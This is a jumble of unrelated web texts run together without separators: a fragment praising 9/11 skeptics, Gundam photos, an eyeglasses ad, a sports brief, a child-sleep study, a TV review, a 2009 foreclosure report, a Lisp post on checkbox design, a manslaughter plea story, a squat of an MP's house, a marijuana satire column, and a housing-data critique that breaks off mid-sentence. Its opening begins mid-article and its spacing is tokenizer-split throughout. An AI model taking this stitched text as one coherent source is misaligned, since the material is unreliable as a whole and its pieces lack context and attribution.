The likes of Seymour Hersh , Bob Woodard and Judith Miller should put their tails between their legs and slink away , while the obscure academic , Dr. David Ray Griffin , while candidate John Buchanan , citizen Eric Hufschmid , author Gore Vidal , independent journalists Michael Ruppert and Christopher Bollyn , and the 9/11 families are recognized among those who kept open the window to Democracy .
Miss Edmonds has challenged us to do our jobs as citizens .
It is n't often that a phone call could change the course of history .
Now is such a time . "
Jim Hogue , a retired high school teacher and professional actor , has been doing a Vermont - based listener - sponsored radio show each week for over 10 years .
Prior to 9/11 , the show was literary in nature , but since then Hogue 's coverage has greatly expanded .
Copyright © 2004 The Baltimore Chronicle .
All rights reserved .
Republication or redistribution of Baltimore Chronicle content is expressly prohibited without their prior written consent .
This story was published on May 07 , 2004 .
This is my first set of photos I took where I did n’t crop or change anything in the photos at all .
What you see above is straight out of the camera .
Which is your favorite Gundam photo from above .
Please tell me in the comments which one you like and why you liked it .
If you liked these you might also want to see the Gundam Wedding Photos
More Information
Flickr photos of Gundam from shibuya246
Some Gundam Wallpaper for your screen ( flickr )
Share this : Facebook
Pinterest
Twitter
Buy Prescription Glasses Online
Buy Prescription Glasses Online
Still worried where to buy spectacles ?
GlassesShop offers you prescription glasses online with more than 1000 fashion styles of frames to choose from .
Using our virtual try - on feature to choose the frames that fit your appearance and provide you with the compliments you deserve .
Our high - quality lenses give you sharper vision along with our state - of - the - art equipment which is crafted from the factory directly .
With no " middlemen " , no retail - space overhead , we bring the best quality eyewear at affordable prices direct from our factories to you .
We are a trustworthy online retailer of eyeglasses , try it now with 30 - day return , 90 - day warranty & 100 % store credit refund guarantee .
ProFootball Talk on NBC Sports
The banged - up 49ers made a series of moves Wednesday .
The signing of tight end Daniel Helm from the Buccaneers ' practice squad and the return of receiver Deebo Samuel to practice already were reported .
The 49ers will have 21 days to activate Samuel to the 53 - player roster .
The 49ers also signed long snapper Taybor Pepper to [ more ]
July 22 , 2009 --
As parents watch their children swimming or playing tag , they often comment happily to each other about how well their kids will sleep that night .
Now there 's scientific data to back up that playground chatter .
A new study shows that active kids fall asleep faster .
The study also shows that the longer it takes to fall asleep , the shorter the total sleep time .
This is important because bad sleep patterns in children have been associated with poorer school performance and an increased risk of being obese or overweight .
The study , published in Archives of Disease in Childhood , included 871 children of European - descent mothers recruited at birth .
Seven years later , 591 of the children participated in the current study .
Participants were part of a broader study called the Auckland Birthweight Collaborative Study .
For the sleep research , participants ' sleep problems and behavior patterns were assessed through questionnaires .
Also , participants wore activity monitors around their waists for 24 hours to measure sleep and physical activity level .
Median sleep latency -- or how long it took a child to fall asleep -- was 26 minutes .
The higher the child 's activity rate , the shorter the sleep latency tended to be .
For every daytime hour the child was sedentary , he or she spent an additional 3.1 minutes trying to fall asleep .
Shorter sleep latency also was linked to longer sleep duration .
" These findings emphasize the importance of physical activity for children , not only for fitness , cardiovascular health and weight control , but also for promoting good sleep , " the researchers write .
I was hesitant to watch this since it was touted as Grey 's Anatomy in space .
I 'm definitely not a fan of Grey 's Anatomy and other prime time soaps .
I might watch it once in a blue moon , but never regularly .
I am however , a huge fan of scifi and seeing a space show on one of the main networks skewed me into watching .
There is a huge flaw in advertising this as Grey 's Anatomy in space .
Scifi fans do n't watch Grey 's Anatomy , and Grey 's Anatomy fans do n't watch scifi .
I have no clue what ABC or the producers were thinking .
I think they could have pitched the show with more Lost in mind .
Admittedly , Defying Gravity is n't traditional scifi , but ABC has to know what kind of audience they want and judging by the overnights , they were way off the mark .
The plot revolves around an unrealistic portrayal of astronauts as they go on a 6 - year journey to a bunch of different planets .
4 men and 4 women great idea ...
They also have HALOS patches that supposedly inhibit libido , but we know that 's not going to work out .
There is a pretty big conspiracy / mystery behind everything which I will go into after explaining the plot of both episodes along with commentary .
The main character is Donner played by Ron Livingston .
He 's an all - American hero , he left some people behind on Mars , he 's kind of impulsive ... we 've seen him before .
Throughout the show , he gives little commentaries a la Meredith from GA , and like most TV monologues , there were n't any insightful things said .
We kind of just learned a little about how he thinks .
There was nothing profound , different , or special about it .
At first , Donner and Shaw who was with him on Mars are just the alternates .
Simultaneously , Ajay and the commander Crane have some kind of heart condition that make them unable to make the journey safely .
Donner steps in as flight engineer for Ajay , and Shaw becomes the commander .
Interspersed through the show are video clips of the members talking that are shown to the public .
It 's similar in style to Virtuality which I will go into in my next post .
The astronauts muse fairly unrealistically about their thoughts and is kind of bland as well .
The " reality " show involves Paula going around with a camera asking people questions .
It 's not very intrusive and I actually liked the fun tone it brought to the show .
Maybe it 's just Paula , but I like her character .
The main problem of the pilot is Ajay who puts his spacesuit on a walks out of the ship .
When Donner and Shaw get there , Donner manages to talk him down .
I was hoping for something dark , maybe Ajay dying or going crazy , it seemed Donner got him back too sudden .
There are flashbacks showing Zoe Barnes during training .
It turns she became pregnant from some guy who said he had a vasectomy but did n't really .
Jen Crane , the wife of Rollie Crane , the commander helps her get an abortion which from my impression are now banned .
Everyone seems overly promiscuous so I really do n't get it and this show does n't seem to be one that will delve into social issues since they 'll be in space with 5 other people for 6 years .
When Donner gets his physical , the doctor tells him that scans show he does n't have a vasectomy even though the chart says he does .
This is a pretty big clue that he was the one who had impregnated her which is confirmed in the second episode .
There is an ongoing thing with Zoe hearing sounds of a baby .
It probably has to do something with her abortion .
Ghosts ?
Her mind ?
It 's interesting and I 'm hoping it can shed light on the abortion ban .
Also , Donner has dreams of being on a spacewalk while Zoe is naked and floating out of the spaceship .
This happened when he was n't even slated to be on the ship , and later he brings up " fate " to Shaw .
In the second episode , Zoe is testing her suit , but the door suddenly opens and she flies out .
To make matters worse , there is a leak in her suit and pressure is dropping .
Luckily , Donner had , as a result of his dream , attached the tether to her suit even though it was unnecessary .
He manages to pull her in , saving her .
The flashbacks show how Donner semi-stalked Zoe until she slept with him .
Right after that happened , she gets a call saying she is part of the space program .
The flashbacks also show how physicist Steve Wassenfelder had some self - confidence issues and failed the swimming portion and how Ajay helped encourage him .
Jen Crane is working on natural selection with bunny embryos , looking at natural selection and then destroying them .
Paula asks her some questions about doing that and she gets a little testy .
And finally , the conspiracy / mystery / what makes this show interesting .
There are references in the show to " it " deciding things .
How " it " decided it did n't want Ajay and Rollie and miraculously gave them heart murmurs , putting Donner and Shaw on board .
" It " got Steve onto the ship even though he bombed the swimming .
Somehow the mission commander Mike Goss and Shaw 's wife Eve follow it 's orders more than tests or qualifications .
Later ,
Eve says it is onboard the ship and called it " Beta . "
It 's possible there is alien influence which is kind of lame .
What would be cool is if it were some kind of entity of fate , a physical manifestation of destiny that influences everything .
Zoe seems to imply that this Beta is stored in pod 4 and Shaw has to get to it .
At the end of the episode , he goes into pod 4 , the door closes behind him and he starts screaming .
I have some issues to gripe about .
The show is set in 2052 except nothing is modernized .
Bathrooms look exactly the same , bars look exactly the same and mission control looks exactly the same .
The visual effects were decent for a low - budget TV production , but there were some times when the ship going through space looked pretty bad .
Other than the twist with the thing controlling everything , the show is basically a rehash of things we 've already seen .
There was n't too many soap opera elements , but from the set up , I can see where we can get huge doses of it , something I certainly do not want .
I will continue watching and review the show since I want to see exactly what 's on the ship .
Score : 8.0/10
I will have a post named Defying Gravity vs. Virtuality in a couple hours .
Stay tuned .
NOTE : This post was updated Saturday morning .
And more fireworks Wednesday .
With the U.S. secretaries of energy and commerce in China this week , much of the attention focused on the standoff over emissions reductions or small breakthroughs in clean - tech cooperation .
But yesterday , Commerce Secretary Gary Locke said something amazing -- U.S ....
Just as the nation ’s housing market has begun showing signs of stabilizing , another wave of foreclosures is poised to strike , possibly as early as this summer , inflicting new punishment on families , communities and the still - troubled national economy .
Amid rising unemployment and falling home prices , mortgage defaults have surged to record levels this year .
Until recently , many banks have put off launching foreclosure action on the troubled properties , in part because they had signed up for the Obama administration ’s home - stability plan , which required them to consider the alternative of modifying loans to make it easier for borrowers to make payments .
Just how big the foreclosure wave will be is unclear .
But loan defaults are up sharply .
And with many government and banks ’ self - imposed foreclosure moratoriums expiring , the biggest lenders indicate that they are likely to move more aggressively to clear up a backlog of troubled mortgages .
Nationally , home sales have been steadying , thanks largely to an abundance of cheap foreclosed properties , government incentives and record low mortgage rates .
Housing construction starts have flattened out , helping to bring supply into balance with demand .
The rate of housing price declines has slowed as well , even turning up in some communities .
Advertisement
But rising foreclosures will depress home values , pushing more homeowners underwater .
Mark Zandi of Moody ’s Economy.com estimates that 15.4 million homeowners -- or about 1 in 5 of those with first mortgages -- owe more on their homes than they are worth .
Also , consumer confidence is already exceedingly low , and another jolt to the housing market could further crimp spending , which has been pummeled by the deep recession and persistent weakness in the job market .
The latest unemployment rate , for June , rose to 9.5 % , and many analysts predict that it will keep rising until the middle of next year .
The rapid pace of layoffs is of particular concern .
Employers shed nearly a half - million jobs in June .
Homeowners who are out of work have little chance of having their mortgages modified .
That puts many homeowners on a collision course with banks that are preparing to take a more aggressive stance .
“ Absolutely , ” Chase Bank spokesman Tom Kelly said when asked about an impending surge in foreclosures .
Since April 6 , Chase has approved modifying 138,000 loans under Obama ’s program .
But an undisclosed number of other Chase borrowers did n’t meet modification eligibility , and many of those homeowners face possible foreclosure .
Advertisement
Separate from that group , Kelly said , Chase is proceeding to deal with an additional 80,000 borrowers in default whose foreclosure process had been voluntarily halted by the lender starting late last year .
Bank of America , the nation ’s largest servicer of home mortgages , also did not release the volume of likely foreclosures .
The bank said it had extended offers to modify loans to more than 45,000 borrowers under the Obama plan .
Bank of America spokesman Dan Frahm said the company was projecting a “ slow increase ” in the number of monthly foreclosures , potentially reaching 30 % above previous normal levels .
Much will depend on how quickly lenders can push the process along .
It generally takes three months to a year from the time a borrower receives a notice of default to a foreclosure sale , in which case the lender usually takes title to the property .
Government and company reports show that the number of completed foreclosures nationwide slowed sharply late last year and into early this year , largely because of various moratoriums in effect during much of the first quarter .
Advertisement
But anecdotal reports indicate that foreclosure sales have started to climb again in the second quarter .
And the pipeline is clearly getting fuller .
In the first quarter , some 1.8 million homeowners nationwide fell behind on their loans by 60 to 90 days , a 15 % increase from the prior quarter , according to Moody ’s Economy.com .
The research firm said that loan defaults rose sharply as well , to 844,000 in the first three months of this year .
California accounts for an outsized share of mortgage loan defaults .
A stunning 135,431 homeowners in the state were hit with notices of default in the first quarter , an increase of 11 % from the earlier peak in the second quarter of 2008 , according to real estate information service MDA DataQuick .
Foreclosure sales in the state have been moderating after averaging a high of 26,500 a month last summer .
In some communities such as Stockton , Calif. , where the real estate market has been among the hardest hit in the nation with home prices plunging 60 % in the last two years , many people are expecting a large increase in foreclosures .
Advertisement
Sales of foreclosed houses soared last year as investors and first - time home buyers swarmed over what were considered bargain houses .
This year it ’s been unusually quiet , says Jerry Abbott , a broker and co-owner of Grupe Real Estate in Stockton .
That does n’t make sense , he said , because he sees many houses in foreclosure in the city .
But just recently , said the 37 - year real estate veteran , there ’s been a surge of requests for so - called broker price opinions , or appraisals that lenders often ask brokers to provide just before they put a foreclosed property on the market .
“ I think it ’s going to be a very big wave , ” he said .
“ Just like what we saw through 2008 . ”
The effect on prices wo n’t be as severe , Abbott said , because values already have plunged and there ’s hearty demand for such properties .
Advertisement
Still , he said , “ It will keep prices low .
. . .
It ’ll just slow the recovery down in general . ”
Michael Chee , 43 , of Burbank is among those worried about what a rise in foreclosures could mean for his home .
Chee was laid off from a healthcare consulting firm in March .
With jobless benefits , he figures he will be able to hold on until he finds a new job .
His three - bedroom house , though down 20 % to 30 % in value , is n’t underwater -- for the present .
“ We ’re OK right now , ” he said , noting that his brother ’s home in Montebello is in foreclosure .
“ But going forward , who knows ?
The way things are going .
. . . ”
Advertisement
The Obama administration is racing to avert as many foreclosures as possible .
So far , more than 240,000 distressed borrowers have been approved on a trial basis under the Home Affordable Modification Program , in which their loans are being reworked so monthly payments are targeted at 31 % of their gross income , said Seth Wheeler , a senior advisor to Treasury Secretary Timothy F. Geithner .
Wheeler said the program ’s goal was to prevent as many as 4 million borrowers from losing their houses over the next 3 1/2 years .
And in August , Treasury officials hope to bolster those efforts with guidelines that could encourage banks to allow more borrowers to sell their properties in a short sale , in which the lender averts a foreclosure by accepting less than the balance of the mortgage .
“ We ’re very unlikely to implement another moratorium , ” Wheeler said .
But he noted that Treasury would closely monitor how many foreclosed homes were dumped onto the market , suggesting that officials could take other steps to prevent a flood of lender - owned properties .
Few people would venture a guess on the magnitude of foreclosure increases .
Part of that will be driven by the job market and the financial condition of so - called prime borrowers and homeowners holding adjustable - rate mortgages , both of which are showing more stress .
Advertisement
Even as defaults among subprime borrowers have trended lower this year , newly initiated foreclosures involving prime mortgage loans saw a significant increase in the first quarter , jumping 21.5 % from the fourth quarter , according to a government report of loan data from national banks and federally regulated thrifts .
--
don.lee@latimes.com
I ’m not fond of MVC and yet I know of nothing better .
What would I want in an alternative ?
Most UI toolkits claim to follow the model - view - controller paradigm if they make any such claim at all .
In my experience though , they either mush together the controller and view , or the model and view , or all three .
As such , there is n’t an opportunity to have the same information represented in multiple places within the interface .
Instead , you have repeated information that is synchronized through a complex scaffolding of change listeners .
Yuck .
Target platform
First , I should mention why I want such a thing .
I am planning to participate in a study group centered around this MIT OpenCourseWare course in Numeric Photography .
I ’ve done plenty of digital imaging in my day .
The assignments for this course though seem to center on novel user interfaces to digital imaging and artistic value of the end results .
The original course was all done as Java applets .
I considered using Armed Bear Common Lisp to try to write Lisp code that interacted with the user through a Java applet .
My initial tests on this went poorly since the ABCL code wants to read and write from your .abclrc and such .
I toyed with code signing and permission granting on it , but was n’t too satisfied with how easily someone else would be able to use it .
Plus , I was n’t too keen on doing so much Java .
So , I want to start with as few dependencies as possible for standalone Lisp applications .
If I could keep the dependencies down to a GUI library of my own crafted atop cl- opengl and cl-png , that would be great .
I suspect that I will have to throw in zpb - ttf at some point to get text into the UI , too .
Toolkit Structure
I am going to use the example of a simple checkbox .
At its heart , a checkbox is simply a boolean value .
The meat or logic of the code does n’t have to care whether the checkbox is visible or enabled or being clicked or has recently changed .
The meat of the code only has to know if it is checked or not .
It would be nice if I could get away with just having a boolean anywhere in my code .
However , some things will need to be triggered when the boolean changes .
As such , I am going to need some setter / getter artifice around the boolean .
So , let ’s make a structure with a single boolean slot .
( defclass checkbox ( )
( ( value : initarg : value : type ( member nil t ) ) )
( : default - initargs : value nil ) )
Let ’s call this the Checkbox Base .
This is all that most of my application will need to know .
Somehow there is a checkbox .
It is either checked or not .
How is the checkbox state presented in the interface ?
It could be drawn on the screen as a little box that either contains a check or not .
It could be drawn as a menu item that either has a check beside it or not .
It could be reflected in the state of some LED somewhere .
It could be presented in hundreds of web browsers across the company as either a green box or a red box .
Let ’s call each of these a Checkbox Representation .
Somehow , each of these Checkbox Representations has to be notified when the value changes .
If I am willing to also include a dependency on Cells ( which has n’t been touched since May of 2005 ) , then I can get this kind of notification for free .
( defclass checkbox ( )
( ( value : initform ( c- in nil ) : accessor checkbox - value ) ) )
( defclass checkbox - as - colored - box ( )
( ( checkbox : initarg : checkbox : type checkbox : reader checkbox )
( color : cell t : initform ( c? ( if ( checkbox - value ( checkbox self ) )
: green
: red ) ) ) ) )
( def - c - output color ( ( self checkbox - as - colored - box ) )
( redraw - checkbox - as - colored - box new - value ) )
Any time the value of the checkbox changes , the color of the checkbox - as - colored - box will change and the trigger to redraw - checkbox - as - colored - box will be invoked with the new color value .
If I do n’t use Cells , then I have to create a layer around the checkbox that tracks who needs to be notified when the value changes .
Let ’s call this a Checkbox Monitor .
It is very tempting to fold this right into the checkbox .
After all , when the checkbox changes , the monitor has to know .
For a slightly better division of functionality , one might make monitored - checkbox a subclass of checkbox :
( defclass monitored - checkbox ( checkbox )
( ( listeners : initform nil ) ) )
In this way , UI components can register with the monitored - checkbox , but the main application never has to notice that the checkbox has the weird methods for adding listeners and such .
With an appropriate : around or : after method , the checkbox code does n’t even have to know if it is part of a monitored - checkbox .
It would be nice if the code did n’t have to know this at instantiation time , but I ’m not seeing an obvious way around that without Cells .
With Cells , each representation could monitor the Checkbox Base .
Without the Cells - type approach , there can really only be one Monitor per Base .
( Technically , there could be more , but they could only be through a direct inheritance chain … you could wrap the Monitor with a Monitor2 and that with a Monitor3 , etc .
But , you would n’t want to try to instantiate a Monitor123 or anything like that . )
For now , let ’s explore the non-Cells case .
The idea so far is that you can create a Checkbox Monitor which is a subclass of Checkbox Base .
Then , you can create some Checkbox Representations and register them with the monitor .
The meat of your code can think of it as a Checkbox Base .
How is it toggled ?
There are a variety of ways that could happen .
Someone could hit a global hot - key that toggles the checkbox .
Someone could select a menu item that toggles the checkbox .
Someone could mouse click on a representation of that checkbox .
My application could receive an event from a remote source like a secondary display , a database , or a filesystem that toggles the checkbox .
Someone could hit the space bar or the enter key while a representation of that checkbox has keyboard focus .
I am not sure we need to create a class hierarchy around changing the checkbox .
We can simply call the setter on the checkbox .
The monitor will catch it and notify everyone who needs to know .
Further , the checkbox itself will be set for anyone who needs to passively query ( rather than needing to track its every change ) .
The big question then is can we enable or disable the checkbox ?
This would have to either be a property of the Checkbox Base ( which does n’t seem right to me ) or a joint effort spanning all places that wish to toggle the checkbox ( which also does n’t seem right ) .
Fortunately , I think we can use multiple - inheritance and more : around methods to take care of this .
( defclass checkbox ( )
( ( value : initform nil : type ( member nil t ) : accessor checkbox - value ) ) )
( defclass monitor ( )
( ( listeners : initform nil ) ) )
( defclass enabler ( )
( ( enabled : initform t : type ( member nil t ) : accessor control - enabled ) ) )
( defclass enabled - checkbox - monitor ( enabler monitor checkbox )
( ) )
( defmethod ( setf checkbox - value ) : around ( new - value checkbox )
( when ( control - enabled checkbox )
( call - next - method ) ) )
Is this any better than the status quo ?
I ’m not sure .
I will have to write more code to find out .
A Sunnyvale woman who was behind the wheel when her boyfriend was killed while car surfing has pleaded no contest to felony vehicular manslaughter and will spend no more than one year in jail , according to the Santa Clara County District Attorney ’s Office .
Athena Ford , 20 , of Sunnyvale , was driving a Toyota Camry on May 16 when her boyfriend , Paul Benabides , 20 , fell off the roof of the car while it was traveling 30 to 40 mph , according to the Sunnyvale Department of Public Safety .
Benabides suffered major head injuries and died shortly after being taken to El Camino Hospital .
In reaching a plea deal with the district attorney ’s office , Ford avoided a possible maximum sentence of 10 years in prison .
“ Based on our review of all factors , including mitigating factors , this is what we felt was appropriate in this case , ” said Amy Cornell , a spokeswoman for the DA ’s office .
Benabides and Ford were out with another friend on a Saturday night in May when Benabides and the other passenger climbed onto the roof of the Camry , which was traveling northbound on Lois Avenue .
Benabides slipped to the rear of the car and held on to the “ rear wing ” while being dragged for an undetermined distance , according to police .
Sunnyvale police Capt .
Doug Moretto said a combination of alcohol and “ horseplay ” led directly to the death .
Benabides ’ mother , Susanna Ramon , is not happy with the outcome .
“ I believe there was n’t any justice for my son , ” Ramon said .
“ I do n’t feel the system worked for him . ”
Benabides attended James Lick High School and was taking auto mechanic classes at the time of his death , his mother said .
Benabides and Ford had been dating for about six weeks when he died , Ramon said .
Ford ’s attorney , Cameron Watt , described the incident as “ a tragedy for everybody involved ” and added that his client received an appropriate sentence .
Watt said that Ford was not bailed out of jail so she could begin a rehabilitation program while in custody .
Watt expects his client to be sentenced to a military - type training program out of Elmwood County Jail that helps people battling drug and alcohol addictions .
“ It ’s an extremely successful program , ” Watt said .
“ She ’s in the right place and I think justice is being served . ”
Contact Mark Gomez at 408-920-5869 .
A group of housing activists have entered and occupied the house of expenses - scandal hit husband and wife Anne and Alan Keene .
Both Labour
MPs they were known as “ Mr and Mrs Expenses ” two years before the MP spending scandal broke ; Mrs Keen , a health minister recently admitted making an expense claim for private hospital treatment for a member of her staff .
At the centre of their scandal was their double mortgage claim , where they illegally used Parliamentary expenses to pay interest on the mortgages of both their homes – one of which has now been occupied by outraged locals along with activists from all backgrounds and nationalities .
It was revealed several days ago that they faced having their Hounslow constituency home repossessed by the council after leaving it empty for over a year .
The £ 385,000 three - bedroom terrace was being renovated whilst they stayed in their central home London near Parliament which they billed the public £ 137,679 for .
After an alleged falling out with the builders the house was left empty , but at a local residents meeting a member of the public alerted activists to the location of the house , and 2 days ago it was occupied .
Speaking by phone one of the occupants explained why they had taken the building and what they wanted to happen .
“ We want to get back something that has been taken from us in the expenses scandal .
Everyone pays taxes , either directly or through VAT on their shopping - we ’ve all been taken from .
There are 10,000 people on the housing waiting list in Hounslow alone – and people like the Keens are spending our money on keeping houses empty . ”
“ Everyone who is needs housing should occupy empty buildings , but as Anne Keene voted in favour of the war in Iraq , displacing and killing millions of people , we demand she gets in touch with refugee centres to make reparations .
In the meantime , the house will hopefully become a refugee centre and home to some of the people she made homeless through poverty and war . ”
The group are asking for solidarity .
Donations of food and water , bedding , hinges and screws are to be taken to :
38 Brook Rd South ,
Brentford ,
TW8 0NN
Marijuana , gateway drug to Jesus / Does pot lead to total enlightenment ?
Rehab ?
Scientology ?
Let 's find out !
All , the lovely mishmash collision of fact , lies , half - truths , dependency , god , and vaguely adorable cultism , all splayed out like a perfectly American buffet
All , the lovely mishmash collision of fact , lies , half - truths , dependency , god , and vaguely adorable cultism , all splayed out like a perfectly American buffet Image 1 of / 3 Caption Close Marijuana , gateway drug to Jesus / Does pot lead to total enlightenment ?
Rehab ?
Scientology ?
Let 's find out !
1 / 3 Back to Gallery
Behold !
I believe I have found it , a flawless specimen , a place where it all collides and coheres and comes together in a madcap , slapdash , whirlwind hellstorm of entirely bogus hype and spin and half - truths , intermixed with hope and despair and Jesus and not just a little methadone , all of it so wonderful and confusing it makes you want to shut it all down , run a hot bath , light up a joint and chill the hell out .
It 's all here .
I even took a screenshot of it , just to show you .
Two , actually .
I 'll link to them in a moment , because I really , really want you to see The Whole Truth , in all Its Profound Glory .
Ready ?
The first comes in the form a big study from the University of Pittsburgh , 12 years in the making , that valiantly attempts to answer , with some reasonable authority , the question that 's already been answered pretty definitively by 500 million pot smokers throughout world history and also by every ounce of common sense in every commonsensical human alive today , but who cares about that now ?
Here 's the big question :
Is marijuana a gateway drug to harder , more dangerous ' n ' deadly substances later in life ?
Did a bunch of kids who smoked pot in their teens go on to become addicts and criminals and Libertarians ?
Did they ruin their lives via meth and coke and sundry other delicious demons in anything resembling dangerous or enlightening percentages , enough that we could finally declare , once and for all , that pot really does lead to destruction and not , as so widely presumed , merely to kinkier sex and fits of uncontrollable laughter and the consumption of rather nauseating food combinations you would never entertain otherwise ?
You already know the answer .
Marijuana , it turns out for the billionth time , is not a gateway drug at all .
Not even a little .
Which is not to say excessive pot use throughout one 's life is not a gateway to becoming , say , a bit of a slothful ' n ' lumpish fan of unwashed dreadlocks and reggae festivals and bad pizza .
But that 's a different study .
But that 's not the fun part .
The fun part is what you can see right there on the Science Blog page -- here 's a link to the first screenshot -- where I read the article in question .
Look over there , just to the left , where the kindly Google AdSense system automatically places related goodies that it scientifically calculates you , the troubled , sinful , pot -smoking reader , might be deeply interested in , given your sinful , illegal predilections .
Hey , look there , it 's an ad for not one , but two drug rehab centers near you .
Is n't that thoughtful ?
And below that , a lovely ad for online Bible study .
Wow , thanks , Google !
You sure as hell nailed my needs .
Let me see if I have it right so far :
Pot is not the slightest bit dangerous , really , but if you 're reading this , here 's a hugely expensive , almost totally ineffectual rehab clinic anyway , and if you missed that one here 's another one , and by the way you could probably use more Jesus in your life because if you 're interested in pot you are clearly a lost and wayward loser , or your husband / sister / child is , and what kid does n't need lots and lots of expensive rehab and Jesus ?
But that 's not even the best part .
The best part is right there in the middle of the article .
See it ?
That scary - looking ad about " Getting the Facts " about pot , with the word ' " marijuana " nicely blasted into some hairy , horror - movie font , all sponsored by a group called the Foundation for a Drug - Free World ?
Hey , Foundation : 1977 called .
It wants its corny alarmism back .
Let us now click on that scary ad .
Whoosh , we are whisked straight over to a wacky , expensive multimedia site from the Drug - Free World people -- here 's screenshot # 2 -- full of video clips and anti-drug propaganda , brochures and studies and " educational " info , some of it featuring " real " people telling their stories of drug - induced horror and of selling their wife into slavery to score another gin and tonic .
Awful !
The kicker :
The link actually launches right into a video clip about pot , where the hunky , stoned teen intones the killer line of all : " They said marijuana was n't a gateway drug .
( puff , swoon , snort ) .
They lied . "
Is n't that great ?
Right in the middle of a scientific article saying pot is not a gateway drug , an ad saying they are lying and pot totally is a gateway drug because ... well , it just is .
And who , pray tell , is the Foundation for a Drug - Free World ?
Why look , 15 seconds of searching ( dear God , is there anything Google can't do ? ) reveals it 's none other than ... those wacky Scientologists .
What a shock .
( By the way , I find I absolutely adore the unicorns ' n ' bunnies utopia implied in the phrase " a drug - free world . "
Sort of like saying " a dust - free desert , " or " a salt - free ocean " or " an adultery - free Republican party . "
It 's like they let an oversheltered child come up with their name .
" Partnership for No More Icky Things Like , Ever " ) .
And lo , we come full circle , swinging wide and full through a multimedia maelstrom of mixed messages , anti-drug PR bulls --t and funhouse misinformation , where tentative science collides with alarmist rhetoric rubs up against your sad need to give yourself over to blind religious faith so you do n't have to think too much ever again .
All of it smashing headlong into professionally produced , dour propaganda funded by one of the weirdest and most litigious " religions " in the known universe , the founder of which was rumored and alleged to be quite the drug user all by his ownself .
Neat !
Hey , check it out .
I 'm reading about the scientifically proven non-dangers of marijuana !
I shall soon enter drug rehab and study the Bible and join the cult of Scientology , so I can , if their videos are to be believed , stop going to the beach on warm , lazy summer days with my friends and lighting up a bong as hot , skinny girls squirm around me in fast - motion and the world slips by in a hazy blur .
It 's all beginning to make perfect sense , is n't it ?
Mark Morford 's latest book is ' The Daring Spectacle : Adventures in Deviant Journalism ' .
Join Mark on Facebook and Twitter , or email him .
His website is markmorford.com .
For his yoga classes , workshops and retreats , click markmorfordyoga.com .
Mark 's column appears every Wednesday on SFGate , and is frequently cross-posted to Huffington Post .
To join the notification list for this column , click here and remove one article of clothing .
To get on Mark 's personal mailing list , click here and remove three more .
This column also has an RSS feed and a very handy archive page .
The latest housing consensus as sung in three part harmony amongst the media and green shoots crowd .
Their song goes something like this :
1 ) The worst of the housing trouble is now behind us ;
2 ) Only recently , Housing was “ Getting worse more slowly ; ”
3 ) That has transitioned to “ Housing is getting better . ”
I do n’t believe it .
IMO , all 3 are misleading or outright wrong .
This post explains why .
On Friday , the market rallied smartly — and while expiry had something to do with it , the larger part of the gains came after the release of the Existing Home Sales data .
Traders ’ kneejerk reaction seemed to reflect the belief that not only is the worst of Housing now behind us , but that Housing was actually getting better .
Indeed , Housing is going to be a growth driver for the economy going forward !
Only , not so much .
A close look at the data reveals this to be a false premise .
If you only read the NAR spin , its easy to fall into their web of happy talk .
( We ’ve said it so many times , it still bears repeating : The National Association of Realtors are a highly misleading news source .
Look past what they say to the actual numbers if you seek economic truth ) .
In the past , I have gone so far as to imply the Realtors group are spinmeisters .
This month , I will be more blunt :
Their actual data has become untrustworthy , their spokesmen lie for a living , and their “ news releases ” is little more than misleading junk .
Investors who rely on the NAR version of the news do so at their own great financial peril .
Witht hat intro , lets dig intot he actual data to show why the real estate trade group happy talk is misleading bunk .
IF YOU ARE INTERESTED IN HOUSING , then you need to thoroughly fisk the NAR data , put it into context , and strip the lipstick off the pig .
Let ’s do just that : A closer look at the actual unspun data reveals the NAR fantasies .
Rather than recently improving , we see that January to July 2009 is actually the weakest 7 month period in 5 years — since the market topped in ’05 .
Consider Mark Hanson ’s analysis :
He points out that “ If not for a surprise and suspect 16 k increase in Northeast condo sales , Existing Home Sales would have been lower month - over - month and only up 12 k units from July 2008 , which was the worst year on record for housing . ”
Let ’s see what happens if we back out those condo sales to look at just Single Family Homes ex Condos — which accounts for the vast majority of the US housing market .
We see a very different picture .
Existing home sales ( ex - Condos ) were down 10 % from July 2007 , flat from July 2008 , and off 5 % from June 2009 .
Hence , the boom in cheap Northeast condo units accounted for all of the excitement in Friday ’s EHS release .
Indeed , the overall UNADJUSTED data shows not only that housing is not getting better , it is still getting worse .
Let ’s go back to the NAR release .
As noted on Friday , on a NON - seasonally - adjusted basis , existing home sales were nowhere near as strong as advertised .
According to M Hanson Advisors :
“ Even with condos included , the all - important Western Region was down 10 % m- o-m .
It is consensus that the housing market in the West is booming .
While sales are booming at low end , I have argued for months that demand from first - timers and investors was at peak levels and July ’s results prove this .
Such weak results m-o-m and relative to 2008 underscore how critically injured the housing market remains .
Think about it …prices are down sharply y- o - y ; rates are at historic lows ; moratoriums and modification initiatives have kept hundreds of thousands of foreclosures off the market ; housing sentiment is worlds better ; a tax credit is available ; and still , y- o -y sales are flat for all intents and purposes and down 6.5 % from weak 2007 levels when pricing was near the peak .
Conditions wo n’t get much better than this in the future — what is it going to take to sell houses ?
This confirms my prior view that there are a lot of federal forces focused mightily to merely maintain housing in a gentle downdraft .
But for this extraordinary government intervention , Housing would actually be much much worse .
Foreclosures would be driving prices much lower — a good thing IMO , as it would hasten the cleansing of the boom ’s excesses .
Recall that as the market topped out in 2005 - 06 , cheaper Condo sales became a disproportionate source of total volume , as struggling buyers ran low on both cash & credit and were forced to move downstream .
That is now replaying over again .
Perhaps its a sign of tight credit conditions or retiring boomers downsizing .
Regardless , the mix of condos to single family homes is especially noteworthy .
Have a look at the chart below , which Hanson rolled out to show the impact Condos have had on the overall Housing sales :
>
Existing Home Sales , NSA , 2005-09
chart courtesy of M Hanson Advisors
>
We see above that in 2009 ( red line ) Sales were behind 2008 ( yellow line ) until June / July .
That is when we jumped 45 k in sales ahead of last year —
Out of 2.8 million housing units sold .
But as Hanson writes :
“ Look at what was thrown at it in order to get this rounding error .
We have thrown in over a trillion dollars to buy rates down , countless $ 8 k tax credits , mortgage mods , foreclosure moratoriums plus hundreds of billions more , and it only bought 45 k yoy additional sales over June & July combined .
After a 50 % to 70 % price hit in the hardest hit areas — that are also the busiest now — only 45 k sales out 2.8 million sold this year are responsible for the national consensus that housing has bottomed , which is the golden key to the consumer recovery spending chest . ”
Remove government interventions , and the housing market collpase would continue unabated .
Finally , let ’s look at one last factor :
The impact of Foreclosures on Seasonal adjustments .
We know that the NAR ’s takes each month ’s data , then runs it through their own meat grinder :
